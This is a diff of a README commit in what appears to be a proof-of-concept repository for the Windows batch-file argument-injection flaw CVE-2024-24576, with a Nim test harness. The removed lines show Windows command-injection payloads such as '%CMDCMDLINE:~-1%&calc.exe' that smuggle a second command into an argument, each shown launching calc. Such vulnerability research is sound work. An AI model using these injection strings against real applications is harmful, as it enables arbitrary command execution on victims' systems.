STRLCPY/CVE-2024-24576-PoC---Nim

Update README.md
Sultan Al Isaiee committed with GitHub 1 month ago

0956d79b

1 parent 2d5a919d

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

Total 1 files

■ ■ ■ ■ ■ ■

README.md

1	1		Exploring Command Injection Vulnerabilities in Windows with Nim
2	2
3		-	In light of the recent discovery outlined in Flatt Security Research's article, the `BatBadBut` vulnerability (CVE-2024-24576) presents a critical concern for Windows' command execution security. A practical investigation using Nim programming language offers insight into how attackers might exploit this vulnerability.
4		-
5		-	Nim, known for its efficiency and expressiveness, isn't immune to the subtle intricacies of command execution on Windows. By experimenting with a simple Nim script designed to execute a `test.bat` file with varying inputs, we uncover the nuances of command injection vulnerability.
6		-
7		-	Your system could be vulnerable if it matches these conditions:
8		-
9		-	- Operating on Windows
10		-	- Executes commands within the application
11		-	- Accepts user input
12		-	- Executes batch files based on user input
13		-
14		-	### The Experiment
15		-
16		-	The Nim script executes the batch file in three distinct manners:
17		-	- Without quoting the shell input using `execProcess`
18		-	- With quoting, using `quoteShell` using `execProcess`
19		-	- Direct shell command execution using `execShellCmd`
20		-
21		-	```
22		-	import osproc, os
23		-
24		-	block execProcess_NoQuoteShell:
25		-	echo "[*] execProcess NoQuoteShell"
26		-	echo "enter payload here"
27		-
28		-	let input = readLine(stdin)
29		-
30		-	let output =
31		-	execProcess("test.bat", args = @[input], options = {poUsePath,
32		-	poStdErrToStdOut})
33		-
34		-	echo "Output:\n", output
35		-
36		-	block execProcess_QuoteShell:
37		-	echo "[*] execProcess QuoteShell"
38		-	echo "enter payload here"
39		-
40		-	let input = readLine(stdin).quoteShell()
41		-
42		-	let output =
43		-	execProcess("test.bat", args = @[input], options = {poUsePath,
44		-	poStdErrToStdOut})
45		-
46		-	echo "Output:\n", output
47		-
48		-	block execShellCmd:
49		-	echo "[*] execShellCmd"
50		-	echo "enter payload here"
51		-
52		-	let input = readLine(stdin)
53		-
54		-	echo "Output:"
55		-	discard execShellCmd("test.bat " & input)
56		-
57		-	```
58		-
59		-	#### Test 1: Simple Payload
60		-
61		-	A benign command, `nim &calc`, reveals differing behaviors:
62		-	- The unquoted execution passes the payload intact, echoing back without unintended consequences.
63		-	- Quoting via `quoteShell` results in misinterpretation, breaking the command.
64		-	- Direct execution surprisingly splits the input, inadvertently running `calc`.
65		-
66		-	```
67		-	[*] execProcess NoQuoteShell
68		-	enter payload here
69		-	nim &calc
70		-	Output:
71		-	Argument received: "nim &calc" # Excpaed correctly
72		-
73		-	[*] execProcess QuoteShell
74		-	enter payload here
75		-	nim &calc
76		-	Output:
77		-	Argument received: "\"nim
78		-	'calc\""' is not recognized as an internal or external command,
79		-	operable program or batch file.
80		-
81		-	[*] execShellCmd
82		-	enter payload here
83		-	nim &calc
84		-	Output:
85		-	Argument received: nim # it run calc
86		-	```
87		-
88		-	#### Test 2: Sophisticated Payload
89		-
90		-	Using a more complex payload, `nim" &calc`, illustrate further discrepancies:
91		-	- Unquoted execution interprets the command in a risky manner, running `calc`.
92		-	- Quoted execution, this time, correctly escapes, showcasing the intended safety mechanism.
93		-	- Direct execution correctly handles the input but underscores potential risk areas.
94		-
95		-	```
96		-	[*] execProcess NoQuoteShell
97		-	enter payload here
98		-	nim" &calc
99		-	Output:
100		-	Argument received: "nim\" #it run calc
101		-
102		-	[*] execProcess QuoteShell
103		-	enter payload here
104		-	nim" &calc
105		-	Output:
106		-	Argument received: "\"nim\\\" &calc\"" #ecaped correctly
107		-
108		-	[*] execShellCmd
109		-	enter payload here
110		-	nim" &calc
111		-	Output:
112		-	Argument received: nim" &calc # escaped correctly
113		-	```
114		-
115		-	#### Test 3: Exploitative Payload
116		-
117		-	An exploitative payload `%CMDCMDLINE:~-1%&calc.exe`, designed to directly invoke `calc.exe`, unearths a consistent threat across all execution methods, demonstrating the ease of initiating unintended commands.
118		-
119		-	```
120		-	[*] execProcess NoQuoteShell
121		-	enter payload here
122		-	%CMDCMDLINE:~-1%&calc.exe
123		-	Output:
124		-	Argument received: e
125		-
126		-	[*] execProcess QuoteShell
127		-	enter payload here
128		-	%CMDCMDLINE:~-1%&calc.exe
129		-	Output:
130		-	Argument received: e
131		-
132		-	[*] execShellCmd
133		-	enter payload here
134		-	%CMDCMDLINE:~-1%&calc.exe
135		-	Output:
136		-	Argument received: e
137		-	```
138		-
139		-	### Conclusion
	3	+	[READ HERE]: https://foxoman.hashnode.dev/exploring-command-injection-vulnerabilities-in-windows-with-nim?showSharer=true
140	4
141	5		Here's a summarized table based on the testing results from the Nim code experiments with different payloads:
142	6
		skipped 14 lines

Update README.md